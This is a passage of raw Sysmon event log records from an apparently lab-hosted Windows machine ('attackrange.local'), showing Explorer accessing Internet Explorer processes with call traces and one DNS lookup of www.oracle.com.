10341000x800000000000000013233Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:24.514{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+3007c|C:\Windows\Explorer.EXE+30028|C:\Windows\Explorer.EXE+2fccc|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013232Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:24.514{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa08(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1ba9bf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1ba966(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a8abf(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b324e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b319b(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d11d0(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d4239(wow64) 10341000x800000000000000013231Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:24.467{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013230Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:24.451{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013229Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:24.451{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013228Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:24.451{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013243Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:27.654{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013242Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:27.639{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+2fd1a|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013241Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:27.639{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+3007c|C:\Windows\Explorer.EXE+30028|C:\Windows\Explorer.EXE+2fccc|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013240Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:27.639{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa08(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1ba9bf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1ba966(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a8abf(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b324e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b319b(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+594080(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d2dd7(wow64) 10341000x800000000000000013239Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:27.607{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013238Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:27.592{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013237Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:27.592{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013236Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:27.592{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013251Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:30.873{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013250Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:30.858{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+2fd1a|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013249Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:30.858{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+3007c|C:\Windows\Explorer.EXE+30028|C:\Windows\Explorer.EXE+2fccc|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013248Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:30.858{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa08(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1ba9bf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1ba966(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a8abf(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b324e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b319b(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d11d0(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d4239(wow64) 10341000x800000000000000013247Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:30.732{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013246Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:30.717{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013245Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:30.717{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013244Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:30.717{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000013268Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:30.738{08A6967A-4781-6000-3A05-000000009A01}6928www.oracle.com0type: 5 ds-www.oracle.com.edgekey.net;type: 5 e2581.dscx.akamaiedge.net;::ffff:23.37.239.246;C:\Program Files (x86)\Internet Explorer\iexplore.exe 10341000x800000000000000013267Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:34.248{08A6967A-4754-6000-1705-000000009A01}34082820C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013266Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:34.233{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+2fd1a|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013265Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:34.233{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+3007c|C:\Windows\Explorer.EXE+30028|C:\Windows\Explorer.EXE+2fccc|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013264Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:31:34.217{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet 